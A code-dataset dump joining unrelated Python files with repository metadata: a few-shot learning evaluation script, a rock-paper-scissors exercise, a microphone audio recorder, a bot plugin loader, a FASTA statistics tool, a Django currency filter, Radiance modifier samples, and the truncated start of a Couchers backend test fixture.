#classifier_opt = torch.optim.SGD(classifier.parameters(), lr = inner_lr, momentum=0.9, dampening=0.9, weight_decay=0.001)
classifier_opt = torch.optim.Adam(classifier.parameters(), lr = inner_lr)
if freeze_backbone is False:
delta_opt = torch.optim.Adam(filter(lambda p: p.requires_grad, pretrained_model.parameters()), lr = inner_lr)
total_epoch = params.ft_steps
if freeze_backbone is False:
pretrained_model.train()
else:
pretrained_model.eval()
classifier.train()
#for epoch in range(total_epoch):
for epoch in tqdm(range(total_epoch), total=total_epoch, leave=False):
rand_id = np.random.permutation(support_size)
for j in range(0, support_size, batch_size):
classifier_opt.zero_grad()
if freeze_backbone is False:
delta_opt.zero_grad()
#####################################
selected_id = torch.from_numpy( rand_id[j: min(j+batch_size, support_size)]).cuda()
z_batch = x_a_i[selected_id]
y_batch = y_a_i[selected_id]
#####################################
output = pretrained_model(z_batch)
output = classifier(output)
loss = loss_fn(output, y_batch)
#####################################
loss.backward()
classifier_opt.step()
if freeze_backbone is False:
delta_opt.step()
classifier.eval()
pretrained_model.eval()
output = pretrained_model(x_b_i.cuda())
if adaptation:
scores = classifier(output)
else:
scores = classifier(z_a_i, y_a_i, output)
y_query = np.repeat(range( n_way ), n_query )
topk_scores, topk_labels = scores.data.topk(1, 1, True, True)
topk_ind = topk_labels.cpu().numpy()
top1_correct = np.sum(topk_ind[:,0] == y_query)
correct_this, count_this = float(top1_correct), len(y_query)
#print (correct_this/ count_this *100)
acc_all.append((correct_this/ count_this *100))
###############################################################################################
pbar.set_postfix(avg_acc=np.mean(np.asarray(acc_all)))
acc_all = np.asarray(acc_all)
acc_mean = np.mean(acc_all)
acc_std = np.std(acc_all)
print('%d Test Acc = %4.2f%% +- %4.2f%%' %(iter_num, acc_mean, 1.96* acc_std/np.sqrt(iter_num)))
if __name__=='__main__':
np.random.seed(10)
params = parse_args('test')
##################################################################
image_size = 224
iter_num = 600
n_query = max(1, int(16* params.test_n_way/params.train_n_way)) #if test_n_way is smaller than train_n_way, reduce n_query to keep batch size small
few_shot_params = dict(n_way = params.test_n_way , n_support = params.n_test_shot)
freeze_backbone = params.freeze_backbone
##################################################################
dataset_names = ["ISIC", "EuroSAT", "CropDisease", "ChestX"]
novel_loaders = []
loader_name = "ISIC"
print ("Loading {}".format(loader_name))
datamgr = ISIC_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
novel_loader = datamgr.get_data_loader(aug =False)
#novel_loaders.append((loader_name, novel_loader))
loader_name = "EuroSAT"
print ("Loading {}".format(loader_name))
datamgr = EuroSAT_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
novel_loader = datamgr.get_data_loader(aug =False)
#novel_loaders.append((loader_name, novel_loader))
loader_name = "CropDisease"
print ("Loading {}".format(loader_name))
datamgr = CropDisease_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
novel_loader = datamgr.get_data_loader(aug =False)
#novel_loaders.append((loader_name, novel_loader))
loader_name = "ChestX"
print ("Loading {}".format(loader_name))
datamgr = Chest_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
novel_loader = datamgr.get_data_loader(aug =False)
novel_loaders.append((loader_name, novel_loader))
#########################################################################
# Print checkpoint path to be loaded
checkpoint_dir = '%s/checkpoints/%s/%s_%s_%s%s_%s%s' %(configs.save_dir, params.dataset,
params.model, params.method,
params.n_support, "s" if params.no_aug_support else "s_aug",
params.n_query, "q" if params.no_aug_query else "q_aug")
checkpoint_dir += "_bs{}".format(params.batch_size)
if params.save_iter != -1:
modelfile = get_assigned_file(checkpoint_dir, params.save_iter)
elif params.method in ['baseline', 'baseline++'] :
modelfile = get_resume_file(checkpoint_dir)
else:
modelfile = get_best_file(checkpoint_dir)
print('Evaluation from checkpoint:', modelfile)
# Perform evaluation
for idx, (loader_name, novel_loader) in enumerate(novel_loaders):
#for idx, novel_loader in tqdm(enumerate(novel_loaders), total=len(novel_loaders), position=0):
print ('Dataset: ', loader_name)
print ('Pretraining Dataset: ', params.dataset)
print('Adaptation? ', params.adaptation)
if params.adaptation:
print (' --> Freeze backbone?', freeze_backbone)
print (' --> Init classifier via prototypes?', params.proto_init)
print (' --> Adaptation steps: ', params.ft_steps)
print (' --> Adaptation learning rate: ', params.lr_rate)
# replace finetine() with your own method
finetune(novel_loader, n_query = 15, adaptation=params.adaptation,
freeze_backbone=freeze_backbone, proto_init=params.proto_init,
pretrained_dataset=params.dataset, **few_shot_params)
| 7,931 | 10 | 229 |
2286f06f0ba8238d9eb915afbf31f42dee3d624c | 1,122 | py | Python | Mundo02CursoemVideo/ex045.py | JuniorMelo-Dev/Python_Guanabara | 680ea59aba81ef043cef2aec46d0ebf1dd4f8c7c | [
"MIT"
] | null | null | null | Mundo02CursoemVideo/ex045.py | JuniorMelo-Dev/Python_Guanabara | 680ea59aba81ef043cef2aec46d0ebf1dd4f8c7c | [
"MIT"
] | null | null | null | Mundo02CursoemVideo/ex045.py | JuniorMelo-Dev/Python_Guanabara | 680ea59aba81ef043cef2aec46d0ebf1dd4f8c7c | [
"MIT"
] | null | null | null | # Crie um programa e faça-o jogar Jokenpô com você.
from random import randint
from time import sleep
itens = ('PEDRA', 'PAPEL', 'TESOURA')
pc = randint(0, 2)
print('''\033[1;4;7;30;47mOPÇÕES\033[m
[ 0 ] \033[1;31mPEDRA\033[m
[ 1 ] \033[1;31mPAPEL\033[m
[ 2 ] \033[1;31mTESOURA\033[m''')
jogador = int(input('Qual a sua jogada? '))
print('JO')
sleep(1)
print('KEN')
sleep(1)
print('PO!')
print('-=-' * 11)
print('PC jogou {}'.format(itens[pc]))
print('Jogador jogou {}'.format(itens[jogador]))
print('-=-' * 11)
if pc == 0: # o pc jogou PEDRA
if jogador == 0:
print('EMPATE')
elif jogador == 1:
print('JOGADOR VENCEU !!')
elif jogador == 2:
print('PC VENCEU !!')
elif pc == 1: # o pc jogou PAPEL
if jogador == 0:
print('PC VENCEU !!')
elif jogador == 1:
print('EMPATE')
elif jogador == 2:
print('JOGADOR VENCEU !!')
elif pc == 2: # o pc jogou TESOURA
if jogador == 0:
print('JOGADOR VENCEU !!')
elif jogador == 1:
print('PC VENCEU !!')
elif jogador == 2:
print('EMPATE')
else:
print('JOGADA INVÁLIDA!') | 25.5 | 51 | 0.571301 | # Crie um programa e faça-o jogar Jokenpô com você.
from random import randint
from time import sleep
itens = ('PEDRA', 'PAPEL', 'TESOURA')
pc = randint(0, 2)
print('''\033[1;4;7;30;47mOPÇÕES\033[m
[ 0 ] \033[1;31mPEDRA\033[m
[ 1 ] \033[1;31mPAPEL\033[m
[ 2 ] \033[1;31mTESOURA\033[m''')
jogador = int(input('Qual a sua jogada? '))
print('JO')
sleep(1)
print('KEN')
sleep(1)
print('PO!')
print('-=-' * 11)
print('PC jogou {}'.format(itens[pc]))
print('Jogador jogou {}'.format(itens[jogador]))
print('-=-' * 11)
if pc == 0: # o pc jogou PEDRA
if jogador == 0:
print('EMPATE')
elif jogador == 1:
print('JOGADOR VENCEU !!')
elif jogador == 2:
print('PC VENCEU !!')
elif pc == 1: # o pc jogou PAPEL
if jogador == 0:
print('PC VENCEU !!')
elif jogador == 1:
print('EMPATE')
elif jogador == 2:
print('JOGADOR VENCEU !!')
elif pc == 2: # o pc jogou TESOURA
if jogador == 0:
print('JOGADOR VENCEU !!')
elif jogador == 1:
print('PC VENCEU !!')
elif jogador == 2:
print('EMPATE')
else:
print('JOGADA INVÁLIDA!') | 0 | 0 | 0 |
e5a3a3eb66e2e65770653b36bee18d3f2bc1e359 | 4,832 | py | Python | src/capture-audio/capture.py | latonaio/Capture-Audio-From-Mic | 1249ce01f644e492c8ca7e47152761132cbb23b0 | [
"MIT"
] | 10 | 2021-09-22T07:14:35.000Z | 2021-11-04T10:21:21.000Z | src/capture-audio/capture.py | latonaio/Capture-Audio-From-Mic | 1249ce01f644e492c8ca7e47152761132cbb23b0 | [
"MIT"
] | null | null | null | src/capture-audio/capture.py | latonaio/Capture-Audio-From-Mic | 1249ce01f644e492c8ca7e47152761132cbb23b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
# Copyright (c) Latona. All rights reserved.
# from StatusJsonPythonModule import StatusJsonRest
from datetime import datetime
import os
import sys
import wave
import pyaudio
import time
from threading import (Event, Thread)
from aion.logger import lprint
from .mysql import MysqlManager
OUTPUT_DIR = "/var/lib/aion/Data/capture-audio-from-mic_1"
if __name__ == "__main__":
main()
| 32.648649 | 89 | 0.630795 | #!/usr/bin/env python3
# coding: utf-8
# Copyright (c) Latona. All rights reserved.
# from StatusJsonPythonModule import StatusJsonRest
from datetime import datetime
import os
import sys
import wave
import pyaudio
import time
from threading import (Event, Thread)
from aion.logger import lprint
from .mysql import MysqlManager
OUTPUT_DIR = "/var/lib/aion/Data/capture-audio-from-mic_1"
class CaptureAudioFromMic():
# sampling_rate = 44100
# sampling_rate = 48000
# sampling_rate = 32000
fmt = pyaudio.paInt16
def __init__(self, device_index, sampling_rate=44100,
chunk=8192, ch=1, rec_time=60):
lprint(">>> Initialized Audio Device")
self.device_index = device_index
self.sampling_rate = sampling_rate
self.chunk = chunk
self.ch = 1
self.rec_time = rec_time
self.audio = pyaudio.PyAudio()
self.frame = []
self.event = Event()
self.is_stream_open = False
self.recording = False
if self.audio.get_device_count() - 1 < device_index:
lprint(self.audio.get_device_count(), device_index)
lprint(">>> Error: this device is not exist")
sys.exit(1)
audio_info = self.audio.get_device_info_by_index(device_index)
lprint(audio_info)
self.outputPath = OUTPUT_DIR
os.makedirs(self.outputPath, exist_ok=True)
def output_wave_file(self):
lprint(">>> start opening stream")
self.stream = self.audio.open(
format=self.fmt, channels=self.ch, rate=self.sampling_rate,
input=True, input_device_index=self.device_index,
frames_per_buffer=self.chunk)
lprint(">>> finish opening stream")
frames = []
audio_range = int(self.sampling_rate / self.chunk * self.rec_time)
for i in range(0, audio_range):
data = self.stream.read(self.chunk)
frames.append(data)
now_time = datetime.now().strftime("%Y%m%d%H%M%S") + "000"
outputFileName = now_time + ".wav"
outputFilePath = os.path.join(self.outputPath, outputFileName)
with wave.open(outputFilePath, 'wb') as wav:
wav.setnchannels(self.ch)
# ビット数
wav.setsampwidth(self.audio.get_sample_size(self.fmt))
# サンプリング周波数
wav.setframerate(self.sampling_rate)
wav.writeframes(b''.join(frames))
self.stream.stop_stream()
self.stream.close()
return outputFilePath
def open_stream(self):
self.stream = self.audio.open(
format=self.fmt, channels=self.ch, rate=self.sampling_rate,
input=True, input_device_index=self.device_index,
frames_per_buffer=self.chunk, stream_callback=self.callback)
def callback(self, in_data, frame_count, time_info, status):
if self.recording is True:
self.frame.append(in_data)
return in_data, pyaudio.paContinue
elif self.recording is False:
return None, pyaudio.paContinue
else:
return None, pyaudio.paContinue
def start_recoding(self):
# initialize frame
# self.frame = []
# self.stream.start_stream()
# self.event.clear()
# lprint("recording...")
# while not self.event.wait(timeout=0):
# data = self.stream.read(self.chunk)
# self.frame.append(data)
self.recording = True
self.stream.start_stream()
lprint("record start")
def complete_recording(self, activity_id):
lprint("stop recording....")
# 複数マイク間の同期を取るために、録音停止信号受信から5秒間のバッファを持たせる
time.sleep(5)
self.recording = False
self.stream.stop_stream()
output_file_name = str(activity_id) + "_" + str(self.device_index) + ".wav"
output_file_path = os.path.join(self.outputPath, output_file_name)
with wave.open(output_file_path, 'wb') as wav:
wav.setnchannels(self.ch)
# ビット数
wav.setsampwidth(self.audio.get_sample_size(self.fmt))
# サンプリング周波数
wav.setframerate(self.sampling_rate)
wav.writeframes(b''.join(self.frame))
lprint("recording complete.record file output to ", output_file_path)
return self.audio.get_sample_size(self.fmt), self.sampling_rate, output_file_path
def main():
# read status json file
argv = sys.argv
if len(argv) != 2:
device_index = 24
else:
device_index = int(argv[1])
captureObj = CaptureAudioFromMic(device_index)
print(">>> start audio recording")
while True:
outputFilePath = captureObj.output_wave_file()
print("> Success: output audio (path: {})".format(outputFilePath))
if __name__ == "__main__":
main()
| 4,203 | 279 | 46 |
e5b9e114418e45138f99bfeef38a9ba499a50e22 | 1,771 | py | Python | bot.py | youknowone/slairck | 2f6604c541610119dc1e48f4c1e33f3d639f0a48 | [
"MIT"
] | 18 | 2015-09-25T16:30:18.000Z | 2021-03-11T08:35:50.000Z | bot.py | youknowone/slairck | 2f6604c541610119dc1e48f4c1e33f3d639f0a48 | [
"MIT"
] | null | null | null | bot.py | youknowone/slairck | 2f6604c541610119dc1e48f4c1e33f3d639f0a48 | [
"MIT"
] | 3 | 2016-10-01T14:26:14.000Z | 2017-12-31T08:17:48.000Z | #!/usr/bin/env python
import sys
sys.dont_write_bytecode = True
import glob
import os
import sys
import logging
from plugin import Plugin
from util import dbg
# except:
# print "error loading plugin %s" % name
| 28.564516 | 80 | 0.555618 | #!/usr/bin/env python
import sys
sys.dont_write_bytecode = True
import glob
import os
import sys
import logging
from plugin import Plugin
from util import dbg
class BotMixin(object):
def output(self):
for plugin in self.bot_plugins:
for output in plugin.do_output():
self.send_item(output)
def collect_relay(self):
items = self.relay_outs
self.relay_outs = []
for plugin in self.bot_plugins:
items += plugin.do_relay_out()
return items
def relay(self, bot, relay_ins):
for data in relay_ins:
if "type" in data:
function_name = "relay_" + data["type"]
dbg("got {}".format(function_name))
for plugin in self.bot_plugins:
plugin.register_jobs()
plugin.do(function_name, bot, data)
def crons(self):
for plugin in self.bot_plugins:
plugin.do_jobs()
def load_plugins(self):
directory = os.path.dirname(sys.argv[0])
if not directory.startswith('/'):
directory = os.path.abspath(
"{}/{}".format(os.getcwd(), directory))
prefix = directory + '/' + self.plugin + '/'
for plugin in glob.glob(prefix + '*'):
sys.path.insert(0, plugin)
sys.path.insert(0, prefix)
for plugin in glob.glob(prefix + '*.py') + glob.glob(prefix + '*/*.py'):
logging.info(plugin)
name = plugin.split('/')[-1][:-3]
# try:
print('load plugin: {} {}'.format(self.__class__.__name__, name))
self.bot_plugins.append(Plugin(name, self.config))
# except:
# print "error loading plugin %s" % name
| 1,371 | 2 | 158 |
4204585ad53350e42a2e913ae0610f3b7f99fb69 | 4,769 | py | Python | fa-stats.py | alrojascr/Virus-Data-Curation | efc2584172c7524f8548693c889906e523ca91ef | [
"MIT"
] | null | null | null | fa-stats.py | alrojascr/Virus-Data-Curation | efc2584172c7524f8548693c889906e523ca91ef | [
"MIT"
] | null | null | null | fa-stats.py | alrojascr/Virus-Data-Curation | efc2584172c7524f8548693c889906e523ca91ef | [
"MIT"
] | null | null | null | from Bio.SeqIO.FastaIO import FastaIterator, FastaWriter
import argparse
import statistics
import sys
parser = argparse.ArgumentParser(epilog='''''',
description='This script runs the statistics of different fasta files',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-f', '--files', nargs='*', help='Fasta files. Select all fasta files you need to process separated by a space', required=True)
parser.add_argument('-o', '--output', default='sorted.fasta', help='Output name. This name will be used for two files: '
'output.fasta: it contains the sorted sequences '
'output.log: it contains a table with all info')
parser.add_argument('-s', '--sort', default=0, choices=[0, 1], type=int, help='Output order. 0- ascendant, 1- descendent')
parser.add_argument('-p', '--print', default=1, choices=[0, 1, 2, 3], type=int,
help='Define how much info is printed. 0- Print only the summary, 1- Print the longest and shortest'
' record per-file, 2- Print the shortest and longest record per-file and 3- Print all stats data for each record and file')
args = parser.parse_args(sys.argv[1:])
# print(args)
# this is the output file for multifasta
sorted_h = open(args.output, "w")
log = open('log.log', 'w')
log.write(' ID | LENGTH | SEQ ID | FILE \n')
# fasta output file handler
gwriter = FastaWriter(sorted_h)
data = {}
stotal = 0
gfsmax = 0
gfsmin = 99999999999
grec_max = []
grec_min = []
gfasta_legth = []
nfiles = 0
# Open the multifasta file
for cfile in args.files:
nfiles += 1
if args.print >= 1:
print(80 * '=')
print(f'Processing {cfile}...')
ftotal = 0
with open(cfile) as fastafile:
rec_max = None
rec_min = None
fasta_legth = []
fsmax = 0
fsmin = 99999999999
for record in FastaIterator(fastafile):
stotal += 1
ftotal += 1
cl = len(record.seq)
fasta_legth.append(cl)
if cl > fsmax:
fsmax = cl
rec_max = record
if cl < fsmin:
fsmin = cl
rec_min = record
if cl > gfsmax:
gfsmax = cl
grec_max = [cfile, record]
if cl < gfsmin:
gfsmin = cl
grec_min = [cfile, record]
if args.print == 3:
print(80 * '-')
print(record)
print(80 * '-')
print('Length: ', cl)
data[stotal] = [cl, cfile, record]
gfasta_legth.extend(fasta_legth)
mean = round(sum(fasta_legth) / len(fasta_legth), 0)
if args.print >= 1:
print('')
print(30 * '*' + ' File Summary ' + 30 * '*')
print(f'Number of records: {ftotal}')
print(f'The average sequences length: {mean}')
print(30 * '_')
print(f'Longest record length: {fsmax}')
if args.print >= 2:
print(30 * '-')
print(f'Longest record: {rec_max}')
print(30 * '_')
print(f'Shortest record length: {fsmin}')
if args.print >= 2:
print(30 * '-')
print(f'Shortest record: {rec_min}')
print(30 * '_')
print('')
if args.sort:
ordered_list = sorted(data.items(), key=lambda x: x[1][0], reverse=True)
else:
ordered_list = sorted(data.items(), key=lambda x: x[1][0])
c = 1
for gid, rlist in ordered_list:
log.write('{:5d} | {:6d} | {:40s} | {:20s}\n'.format(c, rlist[0], rlist[2].id, rlist[1]))
gwriter.write_record(rlist[2])
c += 1
gmean = round(sum(gfasta_legth) / len(gfasta_legth), 0)
# close the output files
sorted_h.close()
print(80 * '#' + '\n')
print(32 * '#' + ' Summary ' + 32 * '#')
print(f'Number of files: {nfiles}')
print(f'Number of records: {stotal}')
print(f'The average sequences length: {gmean}')
print(30 * '_')
print(f'Longest global record length: {gfsmax}')
if args.print >= 2:
print(30 * '-')
print(f'Longest global record file: {grec_max[0]}')
print(f'Longest global record: \n{grec_max[1]}')
print(30 * '_')
print(f'Shortest global record length: {gfsmin}')
if args.print >= 2:
print(30 * '-')
print(f'Shortest global record file: {grec_min[0]}')
print(f'Shortest global record: \n{grec_min[1]}')
print(30 * '_')
| 33.822695 | 185 | 0.531558 | from Bio.SeqIO.FastaIO import FastaIterator, FastaWriter
import argparse
import statistics
import sys
parser = argparse.ArgumentParser(epilog='''''',
description='This script runs the statistics of different fasta files',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-f', '--files', nargs='*', help='Fasta files. Select all fasta files you need to process separated by a space', required=True)
parser.add_argument('-o', '--output', default='sorted.fasta', help='Output name. This name will be used for two files: '
'output.fasta: it contains the sorted sequences '
'output.log: it contains a table with all info')
parser.add_argument('-s', '--sort', default=0, choices=[0, 1], type=int, help='Output order. 0- ascendant, 1- descendent')
parser.add_argument('-p', '--print', default=1, choices=[0, 1, 2, 3], type=int,
help='Define how much info is printed. 0- Print only the summary, 1- Print the longest and shortest'
' record per-file, 2- Print the shortest and longest record per-file and 3- Print all stats data for each record and file')
args = parser.parse_args(sys.argv[1:])
# print(args)
# this is the output file for multifasta
sorted_h = open(args.output, "w")
log = open('log.log', 'w')
log.write(' ID | LENGTH | SEQ ID | FILE \n')
# fasta output file handler
gwriter = FastaWriter(sorted_h)
data = {}
stotal = 0
gfsmax = 0
gfsmin = 99999999999
grec_max = []
grec_min = []
gfasta_legth = []
nfiles = 0
# Open the multifasta file
for cfile in args.files:
nfiles += 1
if args.print >= 1:
print(80 * '=')
print(f'Processing {cfile}...')
ftotal = 0
with open(cfile) as fastafile:
rec_max = None
rec_min = None
fasta_legth = []
fsmax = 0
fsmin = 99999999999
for record in FastaIterator(fastafile):
stotal += 1
ftotal += 1
cl = len(record.seq)
fasta_legth.append(cl)
if cl > fsmax:
fsmax = cl
rec_max = record
if cl < fsmin:
fsmin = cl
rec_min = record
if cl > gfsmax:
gfsmax = cl
grec_max = [cfile, record]
if cl < gfsmin:
gfsmin = cl
grec_min = [cfile, record]
if args.print == 3:
print(80 * '-')
print(record)
print(80 * '-')
print('Length: ', cl)
data[stotal] = [cl, cfile, record]
gfasta_legth.extend(fasta_legth)
mean = round(sum(fasta_legth) / len(fasta_legth), 0)
if args.print >= 1:
print('')
print(30 * '*' + ' File Summary ' + 30 * '*')
print(f'Number of records: {ftotal}')
print(f'The average sequences length: {mean}')
print(30 * '_')
print(f'Longest record length: {fsmax}')
if args.print >= 2:
print(30 * '-')
print(f'Longest record: {rec_max}')
print(30 * '_')
print(f'Shortest record length: {fsmin}')
if args.print >= 2:
print(30 * '-')
print(f'Shortest record: {rec_min}')
print(30 * '_')
print('')
if args.sort:
ordered_list = sorted(data.items(), key=lambda x: x[1][0], reverse=True)
else:
ordered_list = sorted(data.items(), key=lambda x: x[1][0])
c = 1
for gid, rlist in ordered_list:
log.write('{:5d} | {:6d} | {:40s} | {:20s}\n'.format(c, rlist[0], rlist[2].id, rlist[1]))
gwriter.write_record(rlist[2])
c += 1
gmean = round(sum(gfasta_legth) / len(gfasta_legth), 0)
# close the output files
sorted_h.close()
print(80 * '#' + '\n')
print(32 * '#' + ' Summary ' + 32 * '#')
print(f'Number of files: {nfiles}')
print(f'Number of records: {stotal}')
print(f'The average sequences length: {gmean}')
print(30 * '_')
print(f'Longest global record length: {gfsmax}')
if args.print >= 2:
print(30 * '-')
print(f'Longest global record file: {grec_max[0]}')
print(f'Longest global record: \n{grec_max[1]}')
print(30 * '_')
print(f'Shortest global record length: {gfsmin}')
if args.print >= 2:
print(30 * '-')
print(f'Shortest global record file: {grec_min[0]}')
print(f'Shortest global record: \n{grec_min[1]}')
print(30 * '_')
| 0 | 0 | 0 |
d2f19d479c40e47557ab06c7a9bc142cd42c1db7 | 544 | py | Python | django/alumnos/Equipo 14/doorstep/catalog/templatetags/catalog_filters.py | R3SWebDevelopment/CeroUnoApprenticeshipProgramPython | b00b3dce329240889401627e99b72d3d9cadb7d9 | [
"MIT"
] | 1 | 2019-11-29T21:34:42.000Z | 2019-11-29T21:34:42.000Z | django/alumnos/Equipo 14/doorstep/catalog/templatetags/catalog_filters.py | R3SWebDevelopment/CeroUnoApprenticeshipProgramPython | b00b3dce329240889401627e99b72d3d9cadb7d9 | [
"MIT"
] | null | null | null | django/alumnos/Equipo 14/doorstep/catalog/templatetags/catalog_filters.py | R3SWebDevelopment/CeroUnoApprenticeshipProgramPython | b00b3dce329240889401627e99b72d3d9cadb7d9 | [
"MIT"
] | 1 | 2019-11-30T17:51:50.000Z | 2019-11-30T17:51:50.000Z | from django import template
from django.core.exceptions import ImproperlyConfigured
register = template.Library()
@register.filter(name='currency')
def currency(price, currency):
"""
Returns price in currency format
"""
price = float(price)
price *= float(currency.exchange_rate)
try:
return currency.display_format.format(price)
except Exception as e:
raise ImproperlyConfigured('Invalid currency format string: "%s" for currency "%s". %s' % (currency.display_format, currency.name, e.message)) | 30.222222 | 150 | 0.715074 | from django import template
from django.core.exceptions import ImproperlyConfigured
register = template.Library()
@register.filter(name='currency')
def currency(price, currency):
"""
Returns price in currency format
"""
price = float(price)
price *= float(currency.exchange_rate)
try:
return currency.display_format.format(price)
except Exception as e:
raise ImproperlyConfigured('Invalid currency format string: "%s" for currency "%s". %s' % (currency.display_format, currency.name, e.message)) | 0 | 0 | 0 |
6f46bf3c71b5dac925eba35bde1f26a5dc219d78 | 3,075 | py | Python | scripts/sample_modifier.py | MingboPeng/honeybee-schema | 84bfea4c4ed038e3cf71ae2d708b937cb98334d5 | [
"BSD-3-Clause"
] | null | null | null | scripts/sample_modifier.py | MingboPeng/honeybee-schema | 84bfea4c4ed038e3cf71ae2d708b937cb98334d5 | [
"BSD-3-Clause"
] | null | null | null | scripts/sample_modifier.py | MingboPeng/honeybee-schema | 84bfea4c4ed038e3cf71ae2d708b937cb98334d5 | [
"BSD-3-Clause"
] | null | null | null | # coding=utf-8
from __future__ import division
from honeybee_radiance.modifier.material import Trans, Light, BSDF
from honeybee_radiance.lib.modifiers import generic_wall, generic_ceiling, \
black, generic_exterior_window, air_boundary, white_glow
import os
import json
# run all functions within the file
master_dir = os.path.split(os.path.dirname(__file__))[0]
sample_directory = os.path.join(master_dir, 'samples', 'modifier')
modifier_plastic_generic_wall(sample_directory)
modifier_plastic_generic_ceiling(sample_directory)
modifier_plastic_black(sample_directory)
modifier_glass_generic_exterior_window(sample_directory)
modifier_glass_air_boundary(sample_directory)
modifier_trans_tree_foliage(sample_directory)
modifier_glow_white(sample_directory)
modifier_light_green_spotlight(sample_directory)
#modifier_bsdf_klemsfull(sample_directory)
| 36.176471 | 89 | 0.761301 | # coding=utf-8
from __future__ import division
from honeybee_radiance.modifier.material import Trans, Light, BSDF
from honeybee_radiance.lib.modifiers import generic_wall, generic_ceiling, \
black, generic_exterior_window, air_boundary, white_glow
import os
import json
def modifier_plastic_generic_wall(directory):
dest_file = os.path.join(directory, 'modifier_plastic_generic_wall.json')
with open(dest_file, 'w') as fp:
json.dump(generic_wall.to_dict(), fp, indent=4)
def modifier_plastic_generic_ceiling(directory):
dest_file = os.path.join(directory, 'modifier_plastic_generic_ceiling.json')
with open(dest_file, 'w') as fp:
json.dump(generic_ceiling.to_dict(), fp, indent=4)
def modifier_plastic_black(directory):
dest_file = os.path.join(directory, 'modifier_plastic_black.json')
with open(dest_file, 'w') as fp:
json.dump(black.to_dict(), fp, indent=4)
def modifier_glass_generic_exterior_window(directory):
dest_file = os.path.join(directory, 'modifier_glass_generic_exterior_window.json')
with open(dest_file, 'w') as fp:
json.dump(generic_exterior_window.to_dict(), fp, indent=4)
def modifier_glass_air_boundary(directory):
dest_file = os.path.join(directory, 'modifier_glass_air_boundary.json')
with open(dest_file, 'w') as fp:
json.dump(air_boundary.to_dict(), fp, indent=4)
def modifier_trans_tree_foliage(directory):
tree_leaves = Trans.from_single_reflectance('Foliage_0.3', 0.3, 0.0, 0.1, 0.15, 0.15)
dest_file = os.path.join(directory, 'modifier_trans_tree_foliage.json')
with open(dest_file, 'w') as fp:
json.dump(tree_leaves.to_dict(), fp, indent=4)
def modifier_glow_white(directory):
dest_file = os.path.join(directory, 'modifier_glow_white.json')
with open(dest_file, 'w') as fp:
json.dump(white_glow.to_dict(), fp, indent=4)
def modifier_light_green_spotlight(directory):
green_spot = Light('Green_Spotlight', 0, 1, 0)
dest_file = os.path.join(directory, 'modifier_light_green_spotlight.json')
with open(dest_file, 'w') as fp:
json.dump(green_spot.to_dict(), fp, indent=4)
def modifier_bsdf_klemsfull(directory):
relative_path = './scripts/bsdf/klemsfull.xml'
klemsfull = BSDF(relative_path)
dest_file = os.path.join(directory, 'modifier_bsdf_klemsfull.json')
json.dumps(klemsfull.to_dict(), indent=4)
with open(dest_file, 'w') as fp:
json.dump(klemsfull.to_dict(), fp, indent=4)
# run all functions within the file
master_dir = os.path.split(os.path.dirname(__file__))[0]
sample_directory = os.path.join(master_dir, 'samples', 'modifier')
modifier_plastic_generic_wall(sample_directory)
modifier_plastic_generic_ceiling(sample_directory)
modifier_plastic_black(sample_directory)
modifier_glass_generic_exterior_window(sample_directory)
modifier_glass_air_boundary(sample_directory)
modifier_trans_tree_foliage(sample_directory)
modifier_glow_white(sample_directory)
modifier_light_green_spotlight(sample_directory)
#modifier_bsdf_klemsfull(sample_directory)
| 2,000 | 0 | 207 |
76da5b0030b41814faabffaaec3631f341ee9dfb | 24,628 | py | Python | app/backend/src/tests/test_fixtures.py | Zenpanic/couchers | 2e742a2b55eaed3497844efcfe1ee237cc66478c | [
"MIT"
] | null | null | null | app/backend/src/tests/test_fixtures.py | Zenpanic/couchers | 2e742a2b55eaed3497844efcfe1ee237cc66478c | [
"MIT"
] | null | null | null | app/backend/src/tests/test_fixtures.py | Zenpanic/couchers | 2e742a2b55eaed3497844efcfe1ee237cc66478c | [
"MIT"
] | null | null | null | import os
from concurrent import futures
from contextlib import contextmanager
from datetime import date
from pathlib import Path
from unittest.mock import patch
import grpc
import pytest
from sqlalchemy.sql import or_, text
from couchers.config import config
from couchers.constants import GUIDELINES_VERSION, TOS_VERSION
from couchers.crypto import random_hex
from couchers.db import get_engine, session_scope
from couchers.interceptors import AuthValidatorInterceptor, _try_get_and_update_user_details
from couchers.models import (
Base,
FriendRelationship,
FriendStatus,
Language,
LanguageAbility,
LanguageFluency,
Region,
RegionLived,
RegionVisited,
User,
UserBlock,
UserSession,
)
from couchers.servicers.account import Account
from couchers.servicers.admin import Admin
from couchers.servicers.api import API
from couchers.servicers.auth import Auth, create_session
from couchers.servicers.blocking import Blocking
from couchers.servicers.bugs import Bugs
from couchers.servicers.communities import Communities
from couchers.servicers.conversations import Conversations
from couchers.servicers.discussions import Discussions
from couchers.servicers.donations import Donations, Stripe
from couchers.servicers.events import Events
from couchers.servicers.groups import Groups
from couchers.servicers.jail import Jail
from couchers.servicers.media import Media, get_media_auth_interceptor
from couchers.servicers.notifications import Notifications
from couchers.servicers.pages import Pages
from couchers.servicers.references import References
from couchers.servicers.reporting import Reporting
from couchers.servicers.requests import Requests
from couchers.servicers.resources import Resources
from couchers.servicers.search import Search
from couchers.servicers.threads import Threads
from couchers.sql import couchers_select as select
from couchers.utils import create_coordinate, now
from proto import (
account_pb2_grpc,
admin_pb2_grpc,
api_pb2_grpc,
auth_pb2_grpc,
blocking_pb2_grpc,
bugs_pb2_grpc,
communities_pb2_grpc,
conversations_pb2_grpc,
discussions_pb2_grpc,
donations_pb2_grpc,
events_pb2_grpc,
groups_pb2_grpc,
jail_pb2_grpc,
media_pb2_grpc,
notifications_pb2_grpc,
pages_pb2_grpc,
references_pb2_grpc,
reporting_pb2_grpc,
requests_pb2_grpc,
resources_pb2_grpc,
search_pb2_grpc,
stripe_pb2_grpc,
threads_pb2_grpc,
)
def drop_all():
"""drop everything currently in the database"""
with session_scope() as session:
# postgis is required for all the Geographic Information System (GIS) stuff
# pg_trgm is required for trigram based search
# btree_gist is required for gist-based exclusion constraints
session.execute(
text(
